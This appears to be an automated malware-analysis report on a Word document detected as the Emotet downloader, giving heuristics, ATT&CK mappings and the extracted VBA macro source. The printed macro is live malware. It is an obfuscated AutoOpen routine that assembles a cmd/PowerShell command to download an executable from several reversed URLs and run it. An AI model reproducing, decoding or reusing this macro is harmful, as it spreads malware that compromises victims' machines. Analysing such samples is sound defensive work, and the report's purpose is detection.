Verdict: MALICIOUS
Risk Score: 142
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic; T1204.002 Malicious File
The file contains a critical ClamAV detection for Emotet, along with medium-severity heuristics indicating the presence of legacy and standard VBA macros, including an AutoOpen macro. The AutoOpen subroutine in the VBA script attempts to execute a command-line payload using 'cmd.exe', which is obfuscated but appears to be designed to download and execute a second-stage payload. The ClamAV signature specifically names Emotet, supporting this family attribution.
Heuristics (5)
- ClamAV: Doc.Downloader.Emotet-6884106-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6884106-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4231 bytes |

macros.bas SHA-256: 4e93c9b3d50dfbffa52958a20c2f0bb26984cf420b07a03da68a78c4d56038dc

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "SszqwTK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Dim FFQUZc()
ReDim FFQUZc(5)
FFQUZc(0) = 5
FFQUZc(1) = 1
FFQUZc(2) = 22
FFQUZc(3) = 1220
FFQUZc(4) = 41
Dim mSHYrf()
ReDim mSHYrf(5)
mSHYrf(0) = 733
mSHYrf(1) = 75
mSHYrf(2) = 67415281
mSHYrf(3) = 25
mSHYrf(4) = 1579
Dim fskVp()
ReDim fskVp(2)
fskVp(0) = 1244
fskVp(1) = 591
Dim jTroY()
ReDim jTroY(5)
jTroY(0) = 13
jTroY(1) = 27
jTroY(2) = 8128
jTroY(3) = 119003862
jTroY(4) = 4349
Dim MPaKZ()
ReDim MPaKZ(4)
MPaKZ(0) = 379641608
MPaKZ(1) = 46911394
MPaKZ(2) = 38
MPaKZ(3) = 654
Shell@ rovZMtIkZJb + YrOoGfHklwYKir + NjDswvUBmiEEzR, Format(0)
Dim YXIwWR()
ReDim YXIwWR(5)
YXIwWR(0) = 30
YXIwWR(1) = 95
YXIwWR(2) = 5
YXIwWR(3) = 302634732
YXIwWR(4) = 7
Dim NivzZ()
ReDim NivzZ(2)
NivzZ(0) = 90
NivzZ(1) = 1
End Sub
Attribute VB_Name = "VHbwtETzcXNCY"
Function rovZMtIkZJb()
On _
Error _
Resume _
Next
Dim FqHTRA()
ReDim FqHTRA(5)
FqHTRA(0) = 49
FqHTRA(1) = 4997
FqHTRA(2) = 96534893
FqHTRA(3) = 86
FqHTRA(4) = 8583
Dim tsTJGE()
ReDim tsTJGE(4)
tsTJGE(0) = 556
tsTJGE(1) = 4
tsTJGE(2) = 1
tsTJGE(3) = 388606671
Dim wNpfu()
ReDim wNpfu(4)
wNpfu(0) = 68
wNpfu(1) = 3087
wNpfu(2) = 3
wNpfu(3) = 4
baBkpb = Format(Chr(14 + 7 + 8 + 8 + 62)) + "md /V:/" + Format(Chr(10 + 5 + 5 + 5 + 42)) + Format(Chr(4 + 2 + 2 + 2 + 24)) + "s" + "^e^t ^y^k=^ ^ " + " ^ ^ }^}{h" + Format(Chr(14 + 7 + 8 + 8 + 62)) + "ta" + Format(Chr(14 + 7 + 8 + 8 + 62)) + "^" + "}^;^k^a^er^b;^i^b^Q^$ m" + "etI-^e^k^ovn^I;" + ")i^b^Q$ ,rvv$(e^li^F" + "^d^ao^lnw^o^D^.M^w^H${^yr^" + "t^{)uB^w$ n^i^ rvv^$(^h" + Format(Chr(14 + 7 + 8 + 8 + 62)) + "ae" + "r^o^f;^'ex^e.'+RVE"
Dim mwcjF()
ReDim mwcjF(5)
mwcjF(0) = 9067
mwcjF(1) = 23657316
mwcjF(2) = 6
mwcjF(3) = 6
mwcjF(4) = 21
Dim zEIMY()
ReDim zEIMY(2)
zEIMY(0) = 6279
zEIMY(1) = 471557024
Dim dvpCY()
ReDim dvpCY(3)
dvpCY(0) = 192
dvpCY(1) = 351
dvpCY(2) = 334177786
mwOfuLCt = "$^+'^\'" + "^+" + Format(Chr(14 + 7 + 8 + 8 + 62)) + "il^bup^:vne$=i^b^Q^$;^'^5" + "9^6^' = RV^E^$^;)^'@'(ti^" + "l^p^S^.^" + "'s1^tGSL^7r" + "^9j/^ti^" + ".^iz^i^t^a^m^a//^:^p^tth@^m^AW" + "^QuG^f/" + "mo" + Format(Chr(14 + 7 + 8 + 8 + 62)) + ".n^" + "wote^pa" + Format(Chr(14 + 7 + 8 + 8 + 62)) + "^gnir^o^olf^et" + "^an^im^a^l//:^pt^t^h@hQu4U^k" + "^OQ/^e^d^." + "^ten^e^s^o^o^g//:^ptt^h"
Dim iCqkYf()
ReDim iCqkYf(2)
iCqkYf(0) = 548
iCqkYf(1) = 4
Dim Wzpfz()
ReDim Wzpfz(5)
Wzpfz(0) = 80
Wzpfz(1) = 167892834
Wzpfz(2) = 9035
Wzpfz(3) = 8
Wzpfz(4) = 2
Dim YhODj()
ReDim YhODj(5)
YhODj(0) = 797
YhODj(1) = 9
YhODj(2) = 798
YhODj(3) = 86622295
YhODj(4) = 2949
kNSOMtOjXo = "@^EqFQb^ZYr^w^Y/^mo" + Format(Chr(14 + 7 + 8 + 8 + 62)) + ".s^m^ets^ys^-^fe^i" + "l^e^b//^:^" + "p^tth@v^mdup^mLR^SF/o^fn^i^" + ".^gno^s" + Format(Chr(14 + 7 + 8 + 8 + 62)) + "^u^htnei^k." + "zra^ts^p" + "o^pk//" + "^:^p^tt^h'^=u^B^w$^;tnei^l" + Format(Chr(10 + 5 + 5 + 5 + 42)) + "^be" + "^W^.teN^" + " ^t" + Format(Chr(14 + 7 + 8 + 8 + 62)) + "^ej^b^o-^wen=^MwH" + "^$^ l^l^e^h^s" + "re^w^o^p&&^f^o" + "r /^L %^0 ^i"
Dim hTToi()
ReDim hTToi(3)
hTToi(0) = 228
hTToi(1) = 801
hTToi(2) = 8569
Dim tMopO()
ReDim tMopO(4)
tMopO(0) = 52
tMopO(1) = 101626129
tMopO(2) = 223
tMopO(3) = 462115113
FjOdQTYubXn = "n (3^9^3^,-1^,0)^do ^set ^" + "s^Q" + Format(Chr(10 + 5 + 5 + 5 + 42)) + "P=!^s^Q" + Format(Chr(10 + 5 + 5 + 5 + 42)) + "P!!" + "^y^k:~%^0" + ",1!&&^i^f %^0 ^ls^s ^1 " + Format(Chr(14 + 7 + 8 + 8 + 62)) + "a" + "^l^l %^s^Q" + Format(Chr(10 + 5 + 5 + 5 + 42)) + "P:^*^sQ" + Format(Chr(10 + 5 + 5 + 5 + 42)) + "^P" + "^!^=%" + Format(Chr(4 + 2 + 2 + 2 + 24)) + ""
rovZMtIkZJb = baBkpb + mwOfuLCt + kNSOMtOjXo + FjOdQTYubXn
Dim XojQV()
ReDim XojQV(3)
XojQV(0) = 35055573
XojQV(
... (truncated)